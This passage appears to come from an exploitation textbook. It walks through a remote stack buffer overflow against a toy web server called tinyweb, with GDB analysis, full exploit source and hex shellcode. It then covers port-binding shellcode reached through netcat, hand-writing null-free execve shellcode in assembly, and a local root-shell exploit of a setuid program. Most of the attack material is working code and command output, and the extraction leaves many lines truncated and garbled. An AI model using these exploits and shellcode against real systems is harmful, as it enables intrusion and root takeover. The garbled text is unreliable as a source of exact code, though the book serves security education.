0
...
A dedicated attacker could simply telnet to every port to check
the banners, but this technique could easily be expanded to spoof banners also
...
You've seen for yourself how crazy some of the typecasts can
get
...
And since many network programs need
to run as root, these little mistakes can become critical vulnerabilities
...
Did you notice it?

Reach Out and Hack Someone
From hacking-network
...
It will receive from the socket until the EOL byte
* sequence in seen
...

* Returns the size of the read line (without EOL bytes)
...

if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?
eol_matched++;
if(eol_matched == EOL_SIZE) { // If all bytes match terminator,
*(ptr+1-EOL_SIZE) = '\0'; // terminate the string
...

}
} else {
eol_matched = 0;
}
ptr++; // Increment the pointer to the next byte
...

}

The recv_line() function in hacking-network
...
This means received bytes can overflow if they
exceed the dest_buffer size
...

Analysis with GDB
To exploit the vulnerability in the tinyweb
...
First, we need to
know the offset from the start of a buffer we control to the stored return address
...
For example, the program
requires root privileges, so the debugger must be run as root
...
There are other slight differences that can shift memory
around in the debugger like this, creating inconsistencies that can be maddening
to track down
...

One elegant solution to this problem is to attach to the process after it's already
running
...
The source is recompiled using the g option to include debugging symbols that GDB can apply to the running process
...
0 0
...
/tinyweb
reader 13104 0
...
0 2880 748 pts/2 R+ 20:27 0:00 grep tinyweb
reader@hacking:~/booksrc $ gcc -g tinyweb
...
/a
...
so
...

Attaching to process 13019
/cow/home/reader/booksrc/tinyweb: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
c:44
(gdb) list 44
39 if (listen(sockfd, 20) == -1)
40 fatal("listening on socket");
41
42 while(1) { // Accept loop
43 sin_size = size of(struct sockaddr_in);
44 new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
45 if(new_sockfd == -1)
46 fatal("accepting connection");
47
48 handle_connection(new_sockfd, &client_addr);
(gdb) list handle_connection
53 /* This function handles the connection on the passed socket from the
54 * passed client address
...
Finally, the
56 * passed socket is closed at the end of the function
...
c, line 62
...

After attaching to the running process, a stack backtrace shows the program is
currenty in main(), waiting for a connection
...
At this point,
the program's execution must be advanced by making a web request using wget
in another terminal or a browser
...

Breakpoint 2, handle_connection (sockfd=4, client_addr_ptr=0xbffff810) at tinyweb
...
c:62
#1 0x08048cf6 in main () at tinyweb
...
Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 13019
reader@hacking:~/booksrc $

At the breakpoint, the request buffer begins at 0xbfffff5c0
...
Since we know how the local variables are generally laid out on the
stack, we know the request buffer is near the end of the frame
...
Since we already know the general area to look, a quick
inspection shows the stored return address is at 0xbffff7dc ( )
...

However, there are a few bytes near the beginning of the buffer that might be
mangled by the rest of the function
...
To account for this, it's best to just avoid the
beginning of the buffer
...
This means 0xbffff688
is the target return address
...
It fills the exploit buffer with null bytes, so
anything written into it will automatically be null-terminated
...
This builds the NOP sled and fills the buffer up

to the return address overwrite location
...

tinyweb_exploit
...
h>
#include ...
h>
#include ...
h>
#include ...
h>
#include "hacking
...
h"
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // Standard shellcode
#define OFFSET 540
#define RETADDR 0xbffff688
int main(int argc, char *argv[]) {
int sockfd, buflen;
struct hostent *host_info;
struct sockaddr_in target_addr;
unsigned char buffer[600];
if(argc < 2) {
printf("Usage: %s \n", argv[0]);
exit(1);
}
if((host_info = gethostbyname(argv[1])) == NULL)
fatal("looking up hostname");
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
target_addr
...
sin_port = htons(80);
target_addr
...
sin_zero), '\0', 8); // Zero the rest of the struct
...

memset(buffer, '\x90', OFFSET); // Build a NOP sled
...

strcat(buffer, "\r\n"); // Terminate the string
...

send_string(sockfd, buffer); // Send exploit buffer as an HTTP request
...
The exploit also dumps out the
bytes of the exploit buffer before it sends it
...
Here's
the output from the attacker's terminal:
reader@hacking:~/booksrc $ gcc tinyweb_exploit
...
/a
...
0
...
1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 31 c0 31 db |
...
1
...
j
...
Q
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 88 f6 ff bf |
...

reader@hacking:~/booksrc $

Back on the terminal running the tinyweb program, the output shows the exploit
buffer was received and the shellcode is executed
...
Unfortunately, we aren't at the
console, so this won't do us any good
...
/tinyweb
Accepting web requests on port 80
Got request from 127
...
0
...
1"
Opening '
...
html' 200 OK

Got request from 127
...
0
...
jpg HTTP/1
...
/webroot/image
...
0
...
1:58504
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣1␣ 1␣ 1␣␣␣ j
XQh//shh/bin␣␣S ␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣"
NOT HTTP!
sh-3
...
Since we're not at the console, shellcode is just a selfcontained
program, designed to take over another program to open a shell
...

There are many different types of shellcode that can be used in different
situations (or payloads)
...

Port-Binding Shellcode
When exploiting a remote program, spawning a shell locally is pointless
...
Assuming you already have port-binding shellcode ready, using it
is simply a matter of replacing the shellcode bytes defined in the exploit
...
These
shellcode bytes are shown in the output below
...
1
...
j
...
jfXCRfhzifS
...
|
00000020 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd 80 |QV
...
|
00000030 b0 66 43 52 52 56 89 e1 cd 80 93 6a 02 59 b0 3f |
...
j
...
?|
00000040 cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 |
...
Rh//shh/b|
00000050 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |in
...
S
...
c program, resulting in tinyweb_exploit2
...
The new shellcode
line is shown below
...
c
char shellcode[]=
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
"\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80"
"\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f"
"\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
// Port-binding shellcode on port 31337

When this exploit is compiled and run against a host running tinyweb server, the
shellcode listens on port 31337 for a TCP connection
...
This program is netcat (nc for
short), which works like that cat program but over the network
...

The output of this exploit is shown below
...

reader@hacking:~/booksrc $ gcc tinyweb_exploit2
...
/a
...
0
...
1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 6a 66 58 99 |
...

31 db 43 52 6a 01 6a 02 89 e1 cd 80 96 6a 66 58 | 1
...
j
...
j
...

cd 80 b0 66 43 43 53 56 89 e1 cd 80 b0 66 43 52 |
...
fCR
52 56 89 e1 cd 80 93 6a 02 59 b0 3f cd 80 49 79 | RV
...
Y
...
Rh//shh/bin
...
S
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

0d 0a |
...
0
...
1 31337
localhost [127
...
0
...

A program like netcat can be used for many other things
...
Using netcat and the port-binding shellcode in a file, the same exploit
can be carried out on the command line
...
\r\n"')
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣ jfX␣1␣CRj j ␣␣ ␣␣jfXC
RfhzifS␣␣j QV␣␣ ␣fCCSV␣␣ ␣fCRRV␣␣ ␣j Y␣? Iy␣␣
Rh//shh/bin␣␣R␣␣S␣␣ ␣␣␣␣␣␣␣␣
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300'; cat portbinding_shellcode;
perl -e 'print "\x88\xf6\xff\xbf"x38
...
0
...
1 80
localhost [127
...
0
...
0
...
1 31337
localhost [127
...
0
...
The return address is found 540 bytes from the start of the buffer, so
with a 300-byte NOP sled and 92 bytes of shellcode, there are 152 bytes to the
return address overwrite
...
Finally, the
buffer is terminated with '\r\n'
...
netcat connects to the
tinyweb program and sends the buffer
...
Then, netcat is used again to connect to the shell bound on port 31337
...
SHELLCODE
So far, the shellcode used in our exploits has been just a string of copied and
pasted bytes
...
Shellcode is also sometimes referred
to as an exploit payload, since these self-contained programs do the real work
once a program has been hacked
...

Unfortunately, for many hackers the shellcode story stops at copying and pasting
bytes
...
Custom
shellcode gives you absolute control over the exploited program
...
Once you know how to write your own shellcode, your
exploits are limited only by your imagination
...

Assembly vs
...
Writing a program in assembly
is different than writing it in C, but many of the principles are similar
...
Compiled C programs ultimately
perform these tasks by making system calls to the kernel
...

In C, standard libraries are used for convenience and portability
...
A C
program compiled on an x86 processor will produce x86 assembly language
...
There are no standard libraries; instead,
kernel system calls have to be made directly
...

Assembly vs
...
c
#include ...
The strace program is used to trace a program's system calls
...

reader@hacking:~/booksrc $ gcc helloworld
...
/a
...
/a
...
/a
...
so
...
so
...
so
...
}) = 0
mmap2(NULL, 61323, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ee7000
close(3) = 0
access("/etc/ld
...
nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc
...
6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20Z\1\000"
...
}) = 0
mmap2(NULL, 1258876, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7db3000
mmap2(0xb7ee0000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3,
0x12c) =
0xb7ee0000
mmap2(0xb7ee4000, 9596, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0)
=
0xb7ee4000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db2000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db26b0, limit:1048575, seg_32bit:1,
contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7ee0000, 8192, PROT_READ) = 0
munmap(0xb7ee7000, 61323) = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2),
...
The
system calls at the start are setting up the environment and memory for the
program, but the important part is the write() syscall shown in bold
...

The Unix manual pages (accessed with the man command) are separated into
sections
...
h>
ssize_t write(int fd, const void *buf, size_t count);
DESCRIPTION
write() writes up to count bytes to the file referenced by the file
descriptor fd from the buffer starting at buf
...
Note that not all file systems are POSIX conforming
...
The bufand count
arguments are a pointer to our string and its length
...
File descriptors are used for almost everything in
Unix: input, output, file access, network sockets, and so on
...
Opening a file descriptor is like
checking in your coat, since you are given a number that can later be used to
reference your coat
...
These values are
standard and have been defined in several places, such as the
/usr/include/unistd
...

From /usr/include/unistd
...
*/
#define STDIN_FILENO 0 /* Standard input
...
*/
#define STDERR_FILENO 2 /* Standard error output
...
The standard error file
descriptor of 2 is used to display the error or debugging messages that can be
filtered from the standard output
...
These syscalls are listed in
/usr/include/asm-i386/unistd
...

From /usr/include/asm-i386/unistd
...

*/
#define __NR_restart_syscall 0

#define __NR_exit 1

#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4

#define __NR_open 5
#define __NR_close 6
#define __NR_waitpid 7
#define __NR_creat 8
#define __NR_link 9
#define __NR_unlink 10
#define __NR_execve 11
#define __NR_chdir 12
#define __NR_time 13
#define __NR_mknod 14
#define __NR_chmod 15
#define __NR_lchown 16
#define __NR_break 17
#define __NR_oldstat 18
#define __NR_lseek 19
#define __NR_getpid 20
#define __NR_mount 21
#define __NR_umount 22
#define __NR_setuid 23
#define __NR_getuid 24
#define __NR_stime 25
#define __NR_ptrace 26
#define __NR_alarm 27
#define __NR_oldfstat 28
#define __NR_pause 29
#define __NR_utime 30
#define __NR_stty 31
#define __NR_gtty 32
#define __NR_access 33
#define __NR_nice 34
#define __NR_ftime 35
#define __NR_sync 36
#define __NR_kill 37
#define __NR_rename 38
#define __NR_mkdir 39

...
c in assembly, we will make a system call to the
write() function for the output and then a second system call to exit() so the
process quits cleanly
...

Assembly instructions for the x86 processor have one, two, three, or no operands
...
The x86 processor has several 32-bit registers that can be
viewed as hardware variables
...

The mov instruction copies a value between its two operands
...
The int
instruction sends an interrupt signal to the kernel, defined by its single operand
...
When the int 0x80 instruction is executed, the kernel will make a system call
based on the first four registers
...
All of these registers can be set
using the mov instruction
...

The string "Hello, world!" with a newline character (0x0a) is in the data
segment, and the actual assembly instructions are in the text segment
...

helloworld
...
data ; Data segment
msg db "Hello, world!", 0x0a ; The string and newline char
section
...

mov ebx, 1 ; Put 1 into ebx, since stdout is 1
...

mov edx, 14 ; Put 14 into edx, since our string is 14 bytes
...

; SYSCALL: exit(0)
mov eax, 1 ; Put 1 into eax, since exit is syscall #1
...

int 0x80 ; Do the syscall
...
For the write() syscall to
standard output, the value of 4 is put in EAX since the write() function is system
call number 4
...
Next, the address of the
string in the data segment is put into ECX, and the length of the string (in this
case, 14 bytes) is put into EDX
...

To exit cleanly, the exit() function needs to be called with a single argument of 0
...
Then the
system call interrupt is triggered again
...
When compiling C code, the GCC compiler
takes care of all of this automatically
...

The nasm assembler with the -f elf argument will assemble the helloworld
...
By default, this object file
will be called helloworld
...
The linker program ld will produce an executable a
...

reader@hacking:~/booksrc $ nasm -f elf helloworld
...
o
reader@hacking:~/booksrc $
...
out
Hello, world!
reader@hacking:~/booksrc $

This tiny program works, but it's not shellcode, since it isn't self-contained and
must be linked
...
Since shellcode isn't really an executable program,
we don't have the luxury of declaring the layout of data in memory or even using
other memory segments
...
This is commonly
referred to as position-independent code
...
This is fine as long as EIP doesn't try to interpret
the string as instructions
...
When the shellcode gets executed, it could be anywhere in memory
...
Since
EIP cannot be accessed from assembly instructions, however, we need to use
some sort of trick
...

Inst ruct ion Descript ion
push

Push the source operand to the stack
...

call

Call a function, jumping the execution to the address in the location operand
...
The address of the instruvtion following the call is pushed to the
stack, so that execution can return later
...

Stack-based exploits are made possible by the call and ret instructions
...
After the function is finished, the retinstruction pops
the return address from the stack and jumps EIP back there
...

This architecture can be misused in another way to solve the problem of
addressing the inline string data
...
Instead of calling a function, we can jump past the string to a
popinstruction that will take the address off the stack and into a register
...

helloworld1
...

call mark_below ; Call below the string to instructions
db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes
...

mov eax, 4 ; Write syscall #
...
This also pushes the
address of the next instruction to the stack, the next instruction in our case being
the beginning of the string
...
Without using any memory segments,
these raw instructions, injected into an existing process, will execute in a
completely position-independent way
...

reader@hacking:~/booksrc $ nasm helloworld1
...
Hello, worl|
00000010 64 21 0a 0d 59 b8 04 00 00 00 bb 01 00 00 00 ba |d!
...
|
00000020 0f 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 |
...
|
00000032
reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000 E80F000000 call 0x14
00000005 48 dec eax
00000006 656C gs insb
00000008 6C insb
00000009 6F outsd
0000000A 2C20 sub al,0x20
0000000C 776F ja 0x7d
0000000E 726C jc 0x7c
00000010 64210A and [fs:edx],ecx
00000013 0D59B80400 or eax,0x4b859
00000018 0000 add [eax],al
0000001A BB01000000 mov ebx,0x1
0000001F BA0F000000 mov edx,0xf
00000024 CD80 int 0x80

00000026 B801000000 mov eax,0x1
0000002B BB00000000 mov ebx,0x0
00000030 CD80 int 0x80
reader@hacking:~/booksrc $

The nasm assembler converts assembly language into machine code and a
corresponding tool called ndisasm converts machine code into assembly
...
The disassembly instructions marked in bold are
the bytes of the "Hello, world!" string interpreted as instructions
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff9c6
reader@hacking:~/booksrc $
...
Why do you think it crashed? In situations like this, GDB is your best
friend
...

Investigating with GDB
Since the notesearch program runs as root, we can't debug it as a normal user
...
Another way to debug programs is with core dumps
...
This means that dumped core files are allowed
to get as big as needed
...

reader@hacking:~/booksrc $ sudo su
root@hacking:/home/reader/booksrc # ulimit -c unlimited
root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)
root@hacking:/home/reader/booksrc #
...
/notesearch
SHELLCODE will be at 0xbffff9a3
root@hacking:/home/reader/booksrc #
...
/core
-rw------- 1 root root 147456 2007-10-26 08:36
...
/core
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
/notesearch
£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E
...

#0 0x2c6541b7 in ?? ()
(gdb) set dis intel
(gdb) x/5i 0xbffff9a3
0xbffff9a3: call 0x2c6541b7
0xbffff9a8: ins BYTE PTR es:[edi],[dx]
0xbffff9a9: outs [dx],DWORD PTR ds:[esi]
0xbffff9aa: sub al,0x20
0xbffff9ac: ja 0xbffffa1d
(gdb) i r eip
eip 0x2c6541b7 0x2c6541b7
(gdb) x/32xb 0xbffff9a3
0xbffff9a3: 0xe8 0x0f 0x48 0x65 0x6c 0x6c 0x6f 0x2c
0xbffff9ab: 0x20 0x77 0x6f 0x72 0x6c 0x64 0x21 0x0a
0xbffff9b3: 0x0d 0x59 0xb8 0x04 0xbb 0x01 0xba 0x0f
0xbffff9bb: 0xcd 0x80 0xb8 0x01 0xbb 0xcd 0x80 0x00
(gdb) quit
root@hacking:/home/reader/booksrc # hexdump -C helloworld1
00000000 e8 0f 00 00 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c |
...
Y
...
|
00000030 cd 80 |
...
Since we are
running GDB as root, the
...
The memory where the
shellcode should be is examined
...
At least, execution was
redirected, but something went wrong with the shellcode bytes
...
This, however, totally destroys the meaning of the machine
code
...
Such functions will simply terminate at the first null byte,
producing incomplete and unusable shellcode in memory
...

Removing Null Bytes
Looking at the disassembly, it is obvious that the first null bytes come from the
call instruction
...
The call instruction allows for much longer jump distances, which
means that a small value like 19 will have to be padded with leading zeros
resulting in null bytes
...
A small
negative number will have its leading bits turned on, resulting in 0xffbytes
...
The following revision
of the helloworld shellcode uses a standard implementation of this trick: Jump to
the end of the shellcode to a call instruction which, in turn, will jump back to a pop
instruction at the beginning of the shellcode
...
s
BITS 32 ; Tell nasm this is 32-bit code
...

two:

; ssize_t write(int fd, const void *buf, size_t count);
pop ecx ; Pop the return address (string ptr) into ecx
...

mov ebx, 1 ; STDOUT file descriptor
mov edx, 15 ; Length of the string
int 0x80 ; Do syscall: write(1, string, 14)
; void _exit(int status);
mov eax, 1 ; Exit syscall #
mov ebx, 0 ; Status = 0
int 0x80 ; Do syscall: exit(0)
one:
call two ; Call back upwards to avoid null bytes
db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes
...
This solves the first and most
difficult null-byte problem for this shellcode, but there are still many other null
bytes (shown in bold)
...
s
reader@hacking:~/booksrc $ ndisasm -b32 helloworld2
00000000 EB1E jmp short 0x20
00000002 59 pop ecx
00000003 B804000000 mov eax,0x4
00000008 BB01000000 mov ebx,0x1
0000000D BA0F000000 mov edx,0xf

00000012 CD80 int 0x80
00000014 B801000000 mov eax,0x1
00000019 BB00000000 mov ebx,0x0
0000001E CD80 int 0x80
00000020 E8DDFFFFFF call 0x2

00000025 48 dec eax
00000026 656C gs insb
00000028 6C insb
00000029 6F outsd
0000002A 2C20 sub al,0x20
0000002C 776F ja 0x9d
0000002E 726C jc 0x9c
00000030 64210A and [fs:edx],ecx
00000033 0D db 0x0D
reader@hacking:~/booksrc $

These remaining null bytes can be eliminated with an understanding of register
widths and addressing
...

This means execution can only jump a maximum of approximately 128 bytes in
either direction
...
The difference between
assembled machine code for the two jump varieties is shown below:

EB 1E jmp short 0x20

versus

E9 1E 00 00 00 jmp 0x23

The EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP registers are 32 bits in width
...
These original 16-bit versions of the registers can
still be used for accessing the first 16 bits of each corresponding 32-bit register
...
Naturally, assembly instructions using the
smaller registers only need to specify operands up to the register's bit width
...

Machine code Assembly
B8 04 00 00 00 mov eax,0x4
66 B8 04 00

mov ax,0x4

B0 04

mov al,0x4

Using the AL, BL, CL, or DL register will put the correct least significant byte into
the corresponding extended register without creating any null bytes in the
machine code
...
This is especially true for shellcode, since it will be taking over another
process
...
Here are some more simple assembly instructions for
your arsenal
...

Inst ruct ion Descript ion
inc

Increment the target operand by adding 1 to it
...

The next few instructions, like the mov instruction, have two operands
...

Inst ruct ion Descript ion
add ,

Add the source operand to the destination operand, storing the result in the destination
...

Perform a bitwise or logic operation, comparing each bit of one operand with the
corresponding bit of the other operand
...
The final result is stored in the destination operand
...

and ,

1 or 0 = 0
1 or 1 = 1
0 or 1 = 0
0 or 0 = 0
The result bit is on only if both the source bit and the destination bit are on
...

Perform a bitwise exclusive or (xor) logical operation, comparing each bit of one operand with
the corresponding bit of the other operand
...
The final
result is stored in the destination operand
...
Can you think of a way to optimize
this technique? The DWORD value specified in each instruction comprises 80
percent of the code
...
This can be done with a single two-byte instruction:

29 C0 sub eax,eax

Using the sub instruction will work fine when zeroing registers at the beginning
of shellcode
...
For that reason, there is a preferred two-byte instruction
that is used to zero registers in most shellcode
...
Since 1 xor ed with 1 results in a
0, and 0 xored with 0 results in a 0, any value xor ed with itself will result in 0
...

31 C0 xor eax,eax

You can safely use the sub instruction to zero registers (if done at the beginning
of the shellcode), but the xor instruction is most commonly used in shellcode in
the wild
...
The inc and decinstructions have also been
used when possible to make for even smaller shellcode
...
s
BITS 32 ; Tell nasm this is 32-bit code
...

two:
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx ; Pop the return address (string ptr) into ecx
...

mov al, 4 ; Write syscall #4 to the low byte of eax
...

inc ebx ; Increment ebx to 1, STDOUT file descriptor
...

dec ebx ; Decrement ebx back down to 0 for status = 0
...

After assembling this shellcode, hexdump and grep are used to quickly check it
for null bytes
...
s
reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00
00000000 eb 13 59 31 c0 b0 04 31 db 43 31 d2 b2 0f cd 80 |
...
1
...
|
00000010 b0 01 4b cd 80 e8 e8 ff ff ff 48 65 6c 6c 6f 2c |
...
Hello,|
00000020 20 77 6f 72 6c 64 21 0a 0d | world!
...
When used with
an exploit, the notesearch program is coerced into greeting the world like a
newbie
...
/getenvaddr SHELLCODE
...
/notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]------Hello, world!
reader@hacking :~/booksrc $

Shell-Spawning Shellcode
Now that you've learned how to make system calls and avoid null bytes, all sorts of
shellcodes can be constructed
...
System call number 11, execve(), is
similar to the C execute() function that we used in the previous chapters
...
h>
int execve(const char *filename, char *const argv[],
char *const envp[]);
DESCRIPTION
execve() executes the program pointed to by filename
...
In the latter case, the interpreter must
be a valid pathname for an executable which is not itself a script,
which will be invoked as interpreter [arg] filename
...
envp
is an array of strings, conventionally of the form key=value, which are
passed as environment to the new program
...
The argument vector and environment can
be accessed by the called program's main function, when it is defined
as int main(int argc, char *argv[], char *envp[])
...
The environment array— the third
argument—can be empty, but it still need to be terminated with a 32-bit null
pointer
...
Done in C, a program making this call would look like this:

Shell-Spawning Shellcode
exec_shell
...
h>
int main() {
char filename[] = "/bin/sh\x00";
char **argv, **envp; // Arrays that contain char pointers
argv[0] = filename; // The only argument is filename
...

envp[0] = 0; // Null terminate the environment array
...
In addition, the "/bin/sh" string needs to be terminated with a null
byte
...
Dealing with memory in assembly is
similar to using pointers in C
...

Inst ruct ion

Descript ion

lea ,

Load the effective address of the source operand into the destination operand
...
For example, the following instruction in
assembly will treat EBX+12 as a pointer and write eax to where it's pointing
...
The environment array is collapsed into the end of the
argument array, so they share the same 32-bit null terminator
...
s
BITS 32
jmp short two ; Jump down to the bottom for the call trick
...

xor eax, eax ; Put 0 into eax
...

mov [ebx+8], ebx ; Put addr from ebx where the AAAA is
...

lea ecx, [ebx+8] ; Load the address of [ebx+8] into ecx for argv ptr
...

mov al, 11 ; Syscall #11
int 0x80 ; Do it
...

db '/bin/shXAAAABBBB' ; The XAAAABBBB bytes aren't needed
...
Loading the effective address of a bracketed register added to a
value is an efficient way to add the value to the register and store the result in
another register
...
Loading the address of a
dereferenced pointer produces the original pointer, so this instruction puts
EBX+8 into EDX
...

When assembled, this shellcode is devoid of null bytes
...

reader@hacking:~/booksrc $ nasm exec_shell
...
[1
...
C
...
S
...
/getenvaddr SHELLCODE
...
/notesearch $(perl -e 'print "\xc0\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]------sh-3
...
2#

This shellcode, however, can be shortened to less than the current 45 bytes
...
The
smaller the shellcode, the more situations it can be used in
...

reader@hacking:~/booksrc/shellcodes $ hexdump -C exec_shell
00000000 eb 16 5b 31 c0 88 43 07 89 5b 08 89 43 0c 8d 4b |
...
C
...
K|
